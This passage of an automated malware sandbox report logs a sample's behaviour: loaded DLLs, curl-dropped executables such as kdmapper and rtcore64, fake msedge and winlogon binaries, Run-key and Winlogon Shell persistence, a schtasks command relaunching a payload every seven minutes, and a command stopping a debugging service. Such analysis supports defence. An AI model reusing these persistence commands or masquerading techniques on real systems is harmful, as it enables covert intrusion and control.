                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: apphelp.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: version.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: wldp.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: amsi.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: userenv.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: profapi.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: msasn1.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: gpapi.dll
                                Source: C:\Windows\Speech\rtcore64.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dll
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: UY9hUZn4CQ.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: UY9hUZn4CQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: UY9hUZn4CQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: UY9hUZn4CQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: UY9hUZn4CQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: UY9hUZn4CQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: UY9hUZn4CQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: UY9hUZn4CQ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: UY9hUZn4CQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: C:\Calc\Builds\922AVUSVRZEXKB\x64\Release\Loader.pdb,, source: imxyvi.exe, 0000001C.00000000.1350848208.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe, 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe.21.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000034.00000002.1496031187.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp, kdmapper.exe, 00000034.00000000.1468077403.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp, kdmapper.exe, 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe.41.dr
                                Source: Binary string: C:\Calc\Builds\922AVUSVRZEXKB\x64\Release\Loader.pdb source: imxyvi.exe, 0000001C.00000000.1350848208.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe, 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe.21.dr
                                Source: Binary string: C:\Users\Administrator\Desktop\ENIGMA PERM\Build\ENIGMA SOLUTIONS PERM.pdb source: UY9hUZn4CQ.exe
                                Source: Binary string: C:\Users\Administrator\Desktop\ENIGMA PERM\Build\ENIGMA SOLUTIONS PERM.pdb** source: UY9hUZn4CQ.exe
                                Source: Binary string: 6C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.pdb source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: 6C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.pdb source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 0000001F.00000003.1395098552.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394889249.000001EC88A03000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394980774.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394889249.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394980774.000001EC88A03000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395278508.000001EC889C0000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.31.dr
                                Source: UY9hUZn4CQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: UY9hUZn4CQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: UY9hUZn4CQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: UY9hUZn4CQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: UY9hUZn4CQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                barindex
                                Source: C:\Windows\Speech\rtcore64.exeUnpacked PE file: 65.2.rtcore64.exe.730000.0.unpack ZhxHw+:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\__tmp_rar_sfx_access_check_4230218
                                Source: kdmapper.exe.41.drStatic PE information: section name: .didat
                                Source: rtcore64.exe.55.drStatic PE information: section name: ZhxHw+
                                Source: rtcore64.exe.55.drStatic PE information: section name:
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00440905 push ecx; retf 47_2_00440906
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_00452DD9 push eax; retf 47_2_004534E2
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDF640 push ecx; ret 52_2_00EDF653
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDEB78 push eax; ret 52_2_00EDEB96
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_0077A52F push ss; retf 65_2_0077A530
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D079561 push ecx; ret 65_2_6D079574
                                Source: physmeme.exe.31.drStatic PE information: section name: .text entropy: 7.9965850430662675
                                Source: msedge.exe.52.drStatic PE information: section name: .text entropy: 7.556050087022216
                                Source: rtcore64.exe.55.drStatic PE information: section name: ZhxHw+ entropy: 7.999404962177661
                                Source: winlogon.exe.161.drStatic PE information: section name: .text entropy: 7.556050087022216

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Edge\msedge.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeExecutable created and started: C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeExecutable created and started: C:\Windows\Speech\rtcore64.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeExecutable created and started: C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeExecutable created and started: C:\Windows\Speech\imxyvi.exeJump to behavior
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\MQshNARH.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\ITDiARjW.logJump to dropped file
                                Source: C:\Windows\Speech\kdmapper.exeFile created: C:\Edge\msedge.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\rtcore64.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\AppData\Local\winlogon.exeJump to dropped file
                                Source: C:\Windows\Speech\rtcore64.exeFile created: C:\Users\user\AppData\Roaming\msvcp110.dllJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\oLoCRyrD.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\QGjYUwSA.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\imxyvi.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\XEXXxLMp.logJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\rtcore64.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\kdmapper.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\imxyvi.exeJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\ITDiARjW.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\QGjYUwSA.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\oLoCRyrD.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\XEXXxLMp.logJump to dropped file
                                Source: C:\Edge\msedge.exeFile created: C:\Users\user\Desktop\MQshNARH.logJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Edge\msedge.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge
                                Source: C:\Edge\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
